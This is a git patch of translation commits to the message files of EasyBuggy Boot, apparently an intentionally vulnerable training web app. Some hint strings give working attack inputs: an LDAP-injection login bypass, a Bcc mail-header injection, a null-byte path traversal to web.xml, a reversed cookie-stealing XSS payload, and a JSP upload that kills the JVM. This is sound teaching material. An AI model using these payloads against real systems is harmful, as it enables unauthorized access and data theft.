msg.note.ldap.injection=admin\u3068password\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u30ed\u30b0\u30a4\u30f3\u3067\u304d\u307e\u3059\u3002\n*)(|(objectClass\=*\u3001aaaaaaa)\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u8a8d\u8a3c\u3092\u8fc2\u56de\u3057\u3066\u30ed\u30b0\u30a4\u30f3\u3067\u304d\u307e\u3059\u3002 -msg.note.mailheaderinjection=If you change the input tag of the subject field to a textarea tag by browser's developer mode and set it to [subject][line break]Bcc\: [a mail address], then you can send a mail to the address. +msg.note.mailheaderinjection=\u30d6\u30e9\u30a6\u30b6\u306e\u958b\u767a\u8005\u30e2\u30fc\u30c9\u3067\u4ef6\u540d\u306einput\u30bf\u30b0\u3092textarea\u30bf\u30b0\u306b\u5909\u66f4\u3057\u3001\u300c[\u4efb\u610f\u4ef6\u540d][\u6539\u884c]Bcc\: [\u4efb\u610f\u30e1\u30fc\u30eb\u30a2\u30c9\u30ec\u30b9]\u300d\u3092\u5165\u529b\u3057\u3066\u9001\u4fe1\u3059\u308b\u3068\u3001[\u4efb\u610f\u30e1\u30fc\u30eb\u30a2\u30c9\u30ec\u30b9]\u306b\u30e1\u30fc\u30eb\u3092\u9001\u4fe1\u3067\u304d\u307e\u3059\u3002 msg.note.mojibake=\u6587\u5b57\u5217\u306b\u65e5\u672c\u8a9e\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u6587\u5b57\u5316\u3051\u304c\u767a\u751f\u3057\u307e\u3059\u3002 -msg.note.nullbyteinjection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, you can download a file which includes the content of web.xml. +msg.note.nullbyteinjection=\u30d0\u30fc\u30b8\u30e7\u30f31.7.0_40\u3088\u308a\u524d\u306eJava\u3092\u4f7f\u7528\u3057\u3066\u3044\u308b\u5834\u5408\u3001\u30af\u30a8\u30ea\u30b9\u30c8\u30ea\u30f3\u30b0\u306bfileName\=../WEB-INF/web.xml%00\u3092\u4ed8\u52a0\u3059\u308b\u3068\u3001web.xml\u306e\u5185\u5bb9\u3092\u542b\u3080\u30d5\u30a1\u30a4\u30eb\u304c\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3067\u304d\u307e\u3059\u3002 msg.note.open.redirect=admin\u3068password\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u30ed\u30b0\u30a4\u30f3\u3067\u304d\u307e\u3059\u3002\n\u30af\u30a8\u30ea\u30b9\u30c8\u30ea\u30f3\u30b0\u306bgoto\=[\u60aa\u610f\u306e\u3042\u308b\u30b5\u30a4\u30c8\u306eURL]\u3092\u4ed8\u52a0\u3059\u308b\u3068\u3001\u30c1\u30a7\u30c3\u30af\u305b\u305a\u306b\u60aa\u610f\u306e\u3042\u308b\u30b5\u30a4\u30c8\u306eURL\u306b\u30ea\u30c0\u30a4\u30ec\u30af\u30c8\u3057\u307e\u3059\u3002 -msg.note.netsocketleak=Network socket leak occurs every time you load this page. -msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, \nthen JavaVM is forcibly finished. -msg.note.clientinfo=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. \nIf you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. -msg.note.unrestrictedsizeupload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. +msg.note.netsocketleak=\u3053\u306e\u30da\u30fc\u30b8\u3092\u8aad\u307f\u8fbc\u3080\u305f\u3073\u306b\u3001\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u30bd\u30b1\u30c3\u30c8\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 +msg.note.unrestrictedextupload=<% System.exit(0); %>\u3068\u66f8\u3044\u305fJSP\u30d5\u30a1\u30a4\u30eb(\u30d5\u30a1\u30a4\u30eb\u540d\uff1aexit.jsp)\u3092\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3057\u3066\u3001http\://localhost\:8080/uploadFiles/exit.jsp\u306b\u30a2\u30af\u30bb\u30b9\u3059\u308b\u3068\u3001\nJavaVM\u304c\u5f37\u5236\u7d42\u4e86\u3057\u307e\u3059\u3002 +msg.note.clientinfo=\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u30ea\u30b9\u30c6\u30a3\u30f3\u30b0\u304c\u6a5f\u80fd\u3057\u3066\u3044\u308b\u5834\u5408\u3001http\://localhost\:8080/uid/\u306b\u30a2\u30af\u30bb\u30b9\u3059\u308b\u3068\u3001\u305d\u306e\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u5185\u306e\u30d5\u30a1\u30a4\u30eb\u4e00\u89a7\u304c\u8868\u793a\u3055\u308c\u307e\u3059\u3002\n\u3055\u3089\u306bhttp\://localhost\:8080/uid/adminpassword.txt\u306b\u8a18\u8f09\u3055\u308c\u305f\u30a2\u30ab\u30a6\u30f3\u30c8\u3067\u30ed\u30b0\u30a4\u30f3\u3059\u308b\u3068\u3001http\://localhost\:8080/uid/serverinfo.jsp\u3078\u30a2\u30af\u30bb\u30b9\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002 +msg.note.unrestrictedsizeupload=\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u53ef\u80fd\u306a\u30d5\u30a1\u30a4\u30eb\u30b5\u30a4\u30ba\u306e\u5236\u9650\u304c\u7121\u3044\u305f\u3081\u3001DoS\u653b\u6483\u306a\u3069\u306b\u5bfe\u3057\u3066\u8106\u5f31\u3067\u3059\u3002 msg.note.verbose.errror.message=admin\u3068password\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u30ed\u30b0\u30a4\u30f3\u3067\u304d\u307e\u3059\u3002\n\u3053\u306e\u753b\u9762\u3067\u306e\u8a8d\u8a3c\u30a8\u30e9\u30fc\u306e\u30e1\u30c3\u30bb\u30fc\u30b8\u306f\u8a73\u7d30\u904e\u304e\u308b\u305f\u3081\u3001\u30ed\u30b0\u30a4\u30f3\u53ef\u80fd\u306a\u30a2\u30ab\u30a6\u30f3\u30c8\u304c\u63a8\u6e2c\u3057\u3084\u3059\u304f\u306a\u3063\u3066\u3044\u307e\u3059\u3002 msg.note.xee=\u4ee5\u4e0b\u306eXML\u30d5\u30a1\u30a4\u30eb\u3092\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3059\u308b\u3068\u3001\u30b5\u30fc\u30d0\u30fc\u30ea\u30bd\u30fc\u30b9\u3092\u6d6a\u8cbb\u3057\u307e\u3059\u3002 msg.note.xss=\u540d\u524d\u306b>tpircs/<;)eikooc.tnemucod(trela>tpIrcs<\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u30bb\u30c3\u30b7\u30e7\u30f3ID\u304c\u8868\u793a\u3055\u308c\u307e\u3059\u3002 @@ -295,16 +295,16 @@ msg.update.records={0}\u4ef6\u66f4\u65b0\u3057\u307e\u3057\u305f\u3002 msg.update.users.by.xml=\u6b21\u306e\u5f62\u5f0f\u306eXML\u30d5\u30a1\u30a4\u30eb\u3092\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3059\u308b\u3068\u3001\u30e6\u30fc\u30b6\u30fc\u304c\u4e00\u62ec\u3067\u66f4\u65b0\u3067\u304d\u307e\u3059\u3002 msg.update.users=\u30e6\u30fc\u30b6\u30fc\u60c5\u5831\u3092\u4e00\u62ec\u3067\u66f4\u65b0\u3057\u307e\u3059\u3002 msg.select.upload.file=\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3059\u308b\u30d5\u30a1\u30a4\u30eb\u3092\u9078\u629e\u3057\u3066\u4e0b\u3055\u3044\u3002 -msg.note.threadleak=Thread leak occurs every time you load this page. +msg.note.threadleak=\u3053\u306e\u30da\u30fc\u30b8\u3092\u8aad\u307f\u8fbc\u3080\u305f\u3073\u306b\u3001\u30b9\u30ec\u30c3\u30c9\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 msg.user.not.exist=\u30e6\u30fc\u30b6\u30fc\u304c\u5b58\u5728\u3057\u307e\u305b\u3093\u3002 msg.user.already.exist=\u65e2\u306b\u30e6\u30fc\u30b6\u30fc\u304c\u5b58\u5728\u3057\u307e\u3059\u3002 msg.valid.json=\u6b63\u3057\u3044JSON\u6587\u5b57\u5217\u3067\u3059\u3002 msg.warn.enter.name.and.passwd=\u540d\u524d\u3068\u30d1\u30b9\u30ef\u30fc\u30c9\u3092\u5165\u529b\u3057\u3066\u4e0b\u3055\u3044\u3002 -title.clickjacking.page=Change Your Mail -title.csrf.page=Change Your Password -title.clientinfo.page=Client Information -title.design.test.page=Design Test -title.serverinfo.page=Server Information +title.clickjacking.page=\u30e1\u30fc\u30eb\u30a2\u30c9\u30ec\u30b9\u5909\u66f4 +title.csrf.page=\u30d1\u30b9\u30ef\u30fc\u30c9\u5909\u66f4 +title.clientinfo.page=\u30af\u30e9\u30a4\u30a2\u30f3\u30c8\u60c5\u5831 +title.design.test.page=\u30c7\u30b6\u30a4\u30f3\u30c6\u30b9\u30c8 +title.serverinfo.page=\u30b5\u30fc\u30d0\u30fc\u60c5\u5831 style.name.bootstrap=Bootstrap style.description.bootstrap=\u8a73\u7d30\u306f\u6b21\u306e\u30da\u30fc\u30b8\u3092\u53c2\u7167\u4e0b\u3055\u3044\: http\://getbootstrap.com/ style.name.google.mdl=Google Material Design Lite @@ -319,37 +319,37 @@ style.name.monochro=\u30e2\u30ce\u30af\u30ed\u30fc\u30e0 style.description.monochro=\u30e2\u30ce\u30af\u30ed\u306e\u30d8\u30c3\u30c0\u30fc\u3068\u30d5\u30c3\u30bf\u30fc\u304c\u4f7f\u7528\u3055\u308c\u307e\u3059\u3002 style.name.noframe=\u30d5\u30ec\u30fc\u30e0\u306a\u3057 style.description.noframe=\u30d8\u30c3\u30c0\u30fc\u3068\u30d5\u30c3\u30bf\u30fc\u306f\u4f7f\u7528\u3055\u308c\u307e\u305b\u3093\u3002 -title.filedescriptorleak.page=Access History -title.adminmain.page=Main Page for Administrators +title.filedescriptorleak.page=\u30a2\u30af\u30bb\u30b9\u5c65\u6b74 +title.adminmain.page=\u7ba1\u7406\u8005\u5411\u3051\u30e1\u30a4\u30f3\u30da\u30fc\u30b8 title.current.date=\u73fe\u5728\u65e5\u4ed8\u306e\u8868\u793a -title.threadleak.page=Display Current Thread Count +title.threadleak.page=\u73fe\u5728\u306e\u30b9\u30ec\u30c3\u30c9\u6570\u306e\u8868\u793a title.current.time=\u73fe\u5728\u6642\u523b\u306e\u8868\u793a -title.deadlock.page=Detect Deadlock -title.endlesswaiting.page=Execute Batch -title.nullbyteinjection.page=Download Guides +title.deadlock.page=\u30c7\u30c3\u30c9\u30ed\u30c3\u30af\u306e\u691c\u77e5 +title.endlesswaiting.page=\u30d0\u30c3\u30c1\u306e\u5b9f\u884c +title.nullbyteinjection.page=\u30ac\u30a4\u30c9\u306e\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9 title.index.page=EasyBuggy Boot -title.intoverflow.page=The Distance from Earth to the Moon +title.intoverflow.page=\u6708\u307e\u3067\u306e\u8ddd\u96e2 title.login.page=\u7ba1\u7406\u8005\u30ed\u30b0\u30a4\u30f3\u30da\u30fc\u30b8 -title.lossoftrailingdigits.page=Decimal Addition -title.mailheaderinjection.page=Question to Administrator -title.memoryleak.page=Heap Memory Usage -title.memoryleak2.page=Non-Heap Memory Usage +title.lossoftrailingdigits.page=\u5c0f\u6570\u306e\u8db3\u3057\u7b97 +title.mailheaderinjection.page=\u7ba1\u7406\u8005\u3078\u306e\u554f\u3044\u5408\u308f\u305b +title.memoryleak.page=\u30d2\u30fc\u30d7\u30e1\u30e2\u30ea\u306e\u4f7f\u7528\u91cf +title.memoryleak2.page=\u975e\u30d2\u30fc\u30d7\u30e1\u30e2\u30ea\u306e\u4f7f\u7528\u91cf title.mojibake.page=\u6587\u5b57\u5217\u306e\u5148\u982d\u5927\u6587\u5b57\u5316 -title.commandinjection.page=Performing Basic Numeric Operations -title.codeinjection.page=Parse JSON -title.netsocketleak.page=Measure Response Time -title.strplusopr.page=Random String Generator -title.roundofferror.page=Easy Subtraction -title.slowregex.page=Test Regular Expression -title.sqlijc.page=Search Your Secret Number -title.createobjects.page=Sum of natural numbers -title.memoryleak3.page=Display Time Zone Information -title.memoryleak3.page.list=Lists of Time Zones -title.truncationerror.page=Decimal Division -title.unrestrictedextupload.page=Convert Gray Scale of Image File -title.unrestrictedsizeupload.page=Reverse Color of Image File -title.dbconnectionleak.page=User List +title.commandinjection.page=\u6570\u5024\u51e6\u7406\u306e\u5b9f\u884c +title.codeinjection.page=JSON\u306e\u89e3\u6790 +title.netsocketleak.page=\u5fdc\u7b54\u6642\u9593\u306e\u6e2c\u5b9a +title.strplusopr.page=\u30e9\u30f3\u30c0\u30e0\u306a\u6587\u5b57\u5217\u3092\u751f\u6210 +title.roundofferror.page=\u7c21\u5358\u306a\u5f15\u304d\u7b97 +title.slowregex.page=\u6b63\u898f\u8868\u73fe\u306e\u30c6\u30b9\u30c8 +title.sqlijc.page=\u6697\u8a3c\u756a\u53f7\u691c\u7d22 +title.createobjects.page=\u81ea\u7136\u6570\u306e\u7dcf\u548c +title.memoryleak3.page=\u30bf\u30a4\u30e0\u30be\u30fc\u30f3\u60c5\u5831 +title.memoryleak3.page.list=\u30bf\u30a4\u30e0\u30be\u30fc\u30f3\u306e\u4e00\u89a7 +title.truncationerror.page=\u5c0f\u6570\u306e\u5272\u308a\u7b97 +title.unrestrictedextupload.page=\u753b\u50cf\u30d5\u30a1\u30a4\u30eb\u306e\u30b0\u30ec\u30fc\u30b9\u30b1\u30fc\u30eb\u5909\u63db +title.unrestrictedsizeupload.page=\u753b\u50cf\u30d5\u30a1\u30a4\u30eb\u306e\u8272\u53cd\u8ee2 +title.dbconnectionleak.page=\u30e6\u30fc\u30b6\u30fc\u4e00\u89a7 title.xss.page=\u6587\u5b57\u5217\u306e\u9006\u8ee2 -title.xee.page=Batch Registration of Users -title.xxe.page=Batch Update of Users +title.xee.page=\u30e6\u30fc\u30b6\u30fc\u306e\u4e00\u62ec\u767b\u9332 +title.xxe.page=\u30e6\u30fc\u30b6\u30fc\u306e\u4e00\u62ec\u66f4\u65b0 From 31f517d6fc1b04aad26be468def527d5e105b317 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Tue, 24 Oct 2017 21:52:28 +0900 Subject: [PATCH 028/139] New translations messages.properties (Chinese Simplified) --- src/main/resources/messages_zh.properties | 355 ++++++++++------------ 1 file changed, 165 insertions(+), 190 deletions(-) diff --git a/src/main/resources/messages_zh.properties b/src/main/resources/messages_zh.properties index d02e954..5b6babb 100644 --- a/src/main/resources/messages_zh.properties +++ b/src/main/resources/messages_zh.properties @@ -1,148 +1,122 @@ #X-Generator: crowdin.com -description.all=Warning\: Several links cause severe memory leaks or increase a CPU usage rate. They can make your computer unstable.\nThe result may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. - -section.troubles=Troubles +description.access.history=Access history in this page (The latest 15 records). +description.all=Warning\: Several links cause severe memory leaks or increase a CPU usage rate. They can make your computer unstable.The result may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. +description.capitalize.string=If you enter a string, then the capitalized string is shown. For example\: capitalize string -> Capitalize String +description.design.page=You can change design of this page. Please click one of the links below and change this page to your style. +description.design.test=Please click on one of the links below. +description.endless.waiting=If you enter a character count, then a batch (including echo characters of the count) is created and executed. +description.errors=OutOfMemoryError, StackOverflowError, NoClassDefFoundError, and so on\: +description.parse.json=If you enter a JSON string, then a result checked by JSON.parse() of JavaScript is shown. +description.performance.issue=Issues for performance +description.random.string.generator=If you enter a character count, then a random characters of the count is created. +description.response.time=If you add pingurl\=[a URL] to query string, the response code and time from the url is shown. +description.reverse.string=If you enter a string, then the reversed string is shown. +description.section.exceptions=Exceptions, extending from java.lang.RuntimeException\: +description.send.mail=You can send a mail to the site administrator. +description.test.regular.expression=Please test if an input string matches the regular expression ^([a-z0-9]+[-]{0,1}){1,100}$. description.troubles=Memory leak, infinite loop, deadlock, and so on\: +description.vulnerabilities=XSS, SQL Injection, LDAP injection, and so on\: -function.name.memory.leak=Memory Leak (Java heap space) -function.description.memory.leak=Memory leak occurs in Java heap space every time you load this page. -function.name.memory.leak2=Memory Leak ({0}) -function.description.memory.leak2=Memory leak occurs in {0} every time you load this page. -function.name.memory.leak3=Memory Leak (C heap space) -function.description.memory.leak3=Memory leak occurs in C heap space every time you load this page. -function.name.infinite.loop=Infinite Loop -function.description.infinite.loop=Infinite loop occurs if you click this link. -function.name.dead.lock=Deadlock (Java) +function.description.brute.force=This login page is vulnerable for brute-force attack because it does not have an account lock mechanism. +function.description.clickjacking=There is a clickjacking vulnerability in the change mail address page. +function.description.code.injection=There is a code injection vulnerability in this page. +function.description.csrf=There is a CSRF vulnerability in the change password page. +function.description.dangerous.file.inclusion=An external dangerous file can be included in this page. +function.description.database.connection.leak=Database connection leak occurs every time you load the page. function.description.dead.lock=Deadlock (Java) can occur. -function.name.dead.lock2=Deadlock (SQL) function.description.dead.lock2=Deadlock (SQL) can occur. -function.name.endless.waiting.process=Endless Waiting Process +function.description.ei.error=ExceptionInInitializerError is thrown at first, and NoClassDefFoundError is thrown from the second if you click this link. function.description.endless.waiting.process=Endless waiting process can occur. -function.name.jvm.crash.eav=JVM Crash -function.description.jvm.crash.eav=JVM crashes if you click this link. -function.name.redirect.loop=Redirect Loop -function.description.redirect.loop=Redirect loop occurs if you click this link. -function.name.forward.loop=Forward Loop -function.description.forward.loop=Forward loop occurs if you click this link. -function.name.network.socket.leak=Network Socket Leak -function.description.network.socket.leak=Network socket leak occurs every time you load this page. -function.name.database.connection.leak=Database Connection Leak -function.description.database.connection.leak=Database connection leak occurs every time you load the page. -function.name.file.descriptor.leak=File Descriptor Leak function.description.file.descriptor.leak=File descriptor leak occurs every time you load this page. -function.name.thread.leak=Thread Leak -function.description.thread.leak=Thread leak occurs every time you load this page. -function.name.mojibake=Mojibake -function.description.mojibake=Mojibake can occur. -function.name.int.overflow=Integer Overflow +function.description.forward.loop=Forward loop occurs if you click this link. +function.description.infinite.loop=Infinite loop occurs if you click this link. function.description.int.overflow=Integer overflow can occur. -function.name.round.off.error=Round Off Error -function.description.round.off.error=Round off error can occur. -function.name.truncation.error=Truncation Error -function.description.truncation.error=Truncation error can occur. -function.name.cancellation.of.significant.digits=Cancellation of Significant Digits -function.description.cancellation.of.significant.digits=Cancellation of significant digits can occur. -function.name.loss.of.trailing.digits=Loss of Trailing Digits +function.description.jvm.crash.eav=JVM crashes if you click this link. +function.description.ldap.injection=There is an LDAP injection vulnerability in this page. function.description.loss.of.trailing.digits=Loss of trailing digits can occur. - - -section.performance.issue=Performance Issue -description.performance.issue=Issues for performance - -function.name.slow.regular.expression=Delay due to regular expression parse +function.description.mail.header.injection=There is a mail header injection vulnerability in this page. +function.description.memory.leak=Memory leak occurs in Java heap space every time you load this page. +function.description.memory.leak2=Memory leak occurs in {0} every time you load this page. +function.description.memory.leak3=Memory leak occurs in C heap space every time you load this page. +function.description.mojibake=Mojibake can occur. +function.description.network.socket.leak=Network socket leak occurs every time you load this page. +function.description.null.byte.injection=There is a null byte injection vulnerability in this page. +function.description.open.redirect=There is an open redirect vulnerability in this login page. +function.description.os.command.injection=There is an OS command injection vulnerability in this page. +function.description.path.traversal=There is a path traversal vulnerability in this page. +function.description.redirect.loop=Redirect loop occurs if you click this link. +function.description.round.off.error=Round off error can occur. +function.description.session.fixation=This login page is vulnerable for session fixation attack. function.description.slow.regular.expression=It takes time to parse the regular expression if you enter a specific string. -function.name.slow.string.plus.operation=Delay of creating string due to +(plus) operator function.description.slow.string.plus.operation=It takes time to append strings if you enter a large number. -function.name.slow.unnecessary.object.creation=Delay due to unnecessary object creation function.description.slow.unnecessary.object.creation=If you input a large number, it takes time to respond due to unnecessary object creation. -function.name.stop.the.world=Stop the World -function.description.stop.the.world=Stop the World occurs if you click this link. - - -section.vulnerabilities=Vulnerabilities -description.vulnerabilities=XSS, SQL Injection, LDAP injection, and so on\: - -function.name.xss=XSS (Cross Site Scripting) -function.description.xss=There is a cross site scripting vulnerability in this page. -function.name.sql.injection=SQL Injection function.description.sql.injection=There is an SQL injection vulnerability in this page. -function.name.ldap.injection=LDAP Injection -function.description.ldap.injection=There is an LDAP injection vulnerability in this page. +function.description.thread.leak=Thread leak occurs every time you load this page. +function.description.throwable={0} is thrown if you click this link. +function.description.truncation.error=Truncation error can occur. +function.description.unintended.file.disclosure=There is an unintended file disclosure vulnerability in this page. +function.description.unrestricted.ext.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. +function.description.unrestricted.size.upload=This page is vulnerable for attacks such as code injection because there are no limitation for uploading file extension. +function.description.verbose.error.message=It is easy to guess an account who can logs in because authentication error messages on this page are too detailed. +function.description.xee=There is an XEE vulnerability in this page. +function.description.xss=There is a cross site scripting vulnerability in this page. +function.description.xxe=There is an XXE vulnerability in this page. +function.name.brute.force=Login page that allows brute-force attacks +function.name.clickjacking=Clickjacking function.name.code.injection=Code Injection -function.description.code.injection=There is a code injection vulnerability in this page. -function.name.os.command.injection=OS Command Injection -function.description.os.command.injection=There is an OS command injection vulnerability in this page. +function.name.csrf=CSRF (Cross-site Request Forgery) +function.name.dangerous.file.inclusion=Dangerous File Inclusion +function.name.database.connection.leak=Database Connection Leak +function.name.dead.lock=Deadlock (Java) +function.name.dead.lock2=Deadlock (SQL) +function.name.endless.waiting.process=Endless Waiting Process +function.name.file.descriptor.leak=File Descriptor Leak +function.name.forward.loop=Forward Loop +function.name.infinite.loop=Infinite Loop +function.name.int.overflow=Integer Overflow +function.name.jvm.crash.eav=JVM Crash +function.name.ldap.injection=LDAP Injection +function.name.loss.of.trailing.digits=Loss of Trailing Digits function.name.mail.header.injection=Mail Header Injection -function.description.mail.header.injection=There is a mail header injection vulnerability in this page. +function.name.memory.leak=Memory Leak (Java heap space) +function.name.memory.leak2=Memory Leak ({0}) +function.name.memory.leak3=Memory Leak (C heap space) +function.name.mojibake=Mojibake +function.name.network.socket.leak=Network Socket Leak function.name.null.byte.injection=Null Byte Injection -function.description.null.byte.injection=There is a null byte injection vulnerability in this page. -function.name.unrestricted.size.upload=Size Unrestricted File Upload -function.description.unrestricted.size.upload=This page is vulnerable for attacks such as code injection because there are no limitation for uploading file extension. -function.name.unrestricted.ext.upload=Extension Unrestricted File Upload -function.description.unrestricted.ext.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. function.name.open.redirect=Login page that allows Open Redirect -function.description.open.redirect=There is an open redirect vulnerability in this login page. -function.name.brute.force=Login page that allows brute-force attacks -function.description.brute.force=This login page is vulnerable for brute-force attack because it does not have an account lock mechanism. -function.name.session.fixation=Login page that allows session fixation attacks -function.description.session.fixation=This login page is vulnerable for session fixation attack. -function.name.verbose.error.message=Verbose Authentication Error Messages -function.description.verbose.error.message=It is easy to guess an account who can logs in because authentication error messages on this page are too detailed. -function.name.dangerous.file.inclusion=Dangerous File Inclusion -function.description.dangerous.file.inclusion=An external dangerous file can be included in this page. +function.name.os.command.injection=OS Command Injection function.name.path.traversal=Path Traversal -function.description.path.traversal=There is a path traversal vulnerability in this page. +function.name.redirect.loop=Redirect Loop +function.name.round.off.error=Round Off Error +function.name.session.fixation=Login page that allows session fixation attacks +function.name.slow.regular.expression=Delay due to regular expression parse +function.name.slow.string.plus.operation=Delay of creating string due to +(plus) operator +function.name.slow.unnecessary.object.creation=Delay due to unnecessary object creation +function.name.sql.injection=SQL Injection +function.name.thread.leak=Thread Leak +function.name.truncation.error=Truncation Error function.name.unintended.file.disclosure=Unintended File Disclosure -function.description.unintended.file.disclosure=There is an unintended file disclosure vulnerability in this page. -function.name.csrf=CSRF (Cross-site Request Forgery) -function.description.csrf=There is a CSRF vulnerability in the change password page. -function.name.clickjacking=Clickjacking -function.description.clickjacking=There is a clickjacking vulnerability in the change mail address page. +function.name.unrestricted.ext.upload=Extension Unrestricted File Upload +function.name.unrestricted.size.upload=Size Unrestricted File Upload +function.name.verbose.error.message=Verbose Authentication Error Messages function.name.xee=XEE (XML Entity Expansion) -function.description.xee=There is an XEE vulnerability in this page. +function.name.xss=XSS (Cross Site Scripting) function.name.xxe=XXE (XML External Entity) -function.description.xxe=There is an XXE vulnerability in this page. - - -section.errors=Errors -description.errors=OutOfMemoryError, StackOverflowError, NoClassDefFoundError, and so on\: - -function.description.ei.error=ExceptionInInitializerError is thrown at first, and NoClassDefFoundError is thrown from the second if you click this link. - - -section.exceptions=Unchecked Exception -description.section.exceptions=Exceptions, extending from java.lang.RuntimeException\: -function.description.throwable={0} is thrown if you click this link. - - - -description.access.history=Access history in this page (The latest 15 records). -description.capitalize.string=If you enter a string, then the capitalized string is shown. For example\: capitalize string -> Capitalize String -description.design.page=You can change design of this page. Please click one of the links below and change \nthis page to your style. -description.design.test=Please click on one of the links below. -description.endless.waiting=If you enter a character count, then a batch (including echo characters of the count) is created and executed. -description.parse.json=If you enter a JSON string, then a result checked by JSON.parse() of JavaScript is shown. -description.random.string.generator=If you enter a character count, then a random characters of the count is created. -description.response.time=If you add pingurl\=[a URL] to query string, the response code and time from the url is shown. -description.reverse.string=If you enter a string, then the reversed string is shown. -description.test.regular.expression=Please test if an input string matches the regular expression ^([a-z0-9]+[-]{0,1}){1,100}$. -description.send.mail=You can send a mail to the site administrator. label.access.time=Access Time -label.available.characters=Available Characters label.attach.file=Attach File +label.available.characters=Available Characters label.browser=Browser label.calculate=Calculate label.capitalized.string=Capitalized String label.character.count=Character Count label.code=Code label.content=Content -label.current.date=Current Date label.current.thread.count=Current Thread Count -label.current.time=Current Time label.execution.result=Execution Result\: -label.goto.admin.page=Go to admin main page label.go.to.main=Go to main page +label.goto.admin.page=Go to admin main page label.history.back=Back label.ip.address=IP Address label.json.string=JSON String @@ -153,22 +127,22 @@ label.login.user.id=Login User ID label.logout=Log out label.lowercase.characters=Lowercase Characters label.mail=Mail Address -label.memory.init=Init Value -label.memory.used=Used Init Value +label.memory.collection.usage=Collection Usage label.memory.committed=Committed Init Value +label.memory.init=Init Value label.memory.max=Max Init Value -label.memory.usage=Memory Usage label.memory.peak.usage=Peak Memory Usage -label.memory.collection.usage=Collection Usage +label.memory.usage=Memory Usage +label.memory.used=Used Init Value label.metaspace=Metaspace -label.permgen.space=PermGen space -label.platform=Platform label.name=Name label.numbers=Numbers label.obelus=/ label.password=Password +label.permgen.space=PermGen space label.phone=Phone label.ping.url=Ping URL +label.platform=Platform label.response.code=Response Code label.response.time=Response Time label.reversed.string=Reversed String @@ -179,14 +153,9 @@ label.string=String label.subject=Subject label.submit=Submit label.times=times -label.timezone.dst.savings=Amount of DST -label.timezone.has.same.rules=Same Rule as Default label.timezone.id=Time Zome ID -label.timezone.in.daylight.time=Being in DST label.timezone.name=Time Zome Name label.timezone.offset=Time Zome Offset -label.timezone.raw.offset=Amount of Raw Offset Time -label.timezone.use.daylight.time=Useing DST label.update=Update label.upload=Upload label.uppercase.characters=Uppercase Characters @@ -194,8 +163,9 @@ label.user.agent=User Agent label.user.id=User ID label.value=Value label.version=Version -label.your.name=Your Name label.your.mail=Your Mail Address +label.your.name=Your Name + msg.account.locked=Your account is locked out because the number of login failures exceeds 10 times. msg.add.users.by.xml=If you upload an XML file of the following format, users can be registered all at once. msg.admin.page.top=Well come to admins page\!\! @@ -205,7 +175,6 @@ msg.batch.registration.complete=Batch registration of users has completed. msg.batch.registration.fail=Batch registration of users fails. msg.batch.update.complete=Batch update of users has completed. msg.batch.update.fail=Batch update of users fails. -msg.note.memoryleak3=Memory leak occurs in C heap space every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. msg.calc.sym.natural.numbers=This page can calculate the sum of all natural numbers (1 + 2 + 3 + ... + n) less than or equal to n. msg.cant.create.batch=Can't create a batch file. msg.convert.grayscale=You can convert the color of an image file into gray scale. @@ -216,140 +185,146 @@ msg.dead.lock.detected=Deadlock is detected. msg.dead.lock.not.occur=Deadlock has not occurred yet. msg.deadlock.occurs=A lock could not be obtained due to a deadlock. msg.download.file=You can download the following PDF files. +msg.enter.decimal.value=Please enter the absolute value of a decimal number less than 1. msg.enter.json.string=Please enter JSON string. msg.enter.mail=Please enter your mail address. msg.enter.math.expression=Please enter a mathematical expression. You can use java.lang.Math in the expression. For example, Math.sqrt(Math.pow(2, 6)) - 5 -msg.enter.name.and.passwd=If you enter your name and password, then your secret number is shown. msg.enter.name=Please enter your name. +msg.enter.name.and.passwd=If you enter your name and password, then your secret number is shown. msg.enter.passwd=If you enter a new password and click the submit button, then your password will be changed. msg.enter.positive.number=Please enter a positive number. -msg.enter.decimal.value=Please enter the absolute value of a decimal number less than 1. -msg.enter.id.and.password=Please enter your user ID and password. msg.enter.string=Please enter a string. msg.error.user.not.exist=User does not exist or password does not match. msg.executed.batch=Created and executed the batch\: -msg.note.filedescriptorleak=File descriptor leak occurs every time you load this page. -msg.info.jvm.not.crash=JVM crash only occurs if using Oracle JDK 6 or 7. msg.invalid.expression=Invalid expression \: {0} msg.invalid.json=Invalid JSON \: {0} -msg.note.memoryleak=Memory leak occurs in Java heap space every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. msg.low.alphnum8=Password is 8 lowercase alphanumeric characters. -msg.need.admin.privilege=You need admin privileges to go ahead from here. -msg.note.brute.force=You can login with admin and password. \nThe number of login attempts is not limited on this page, so the brute force attack is possible. +msg.mail.change.failed=Mail address change failed. +msg.mail.changed=Your mail address is successfully changed. +msg.mail.format.is.invalid=The 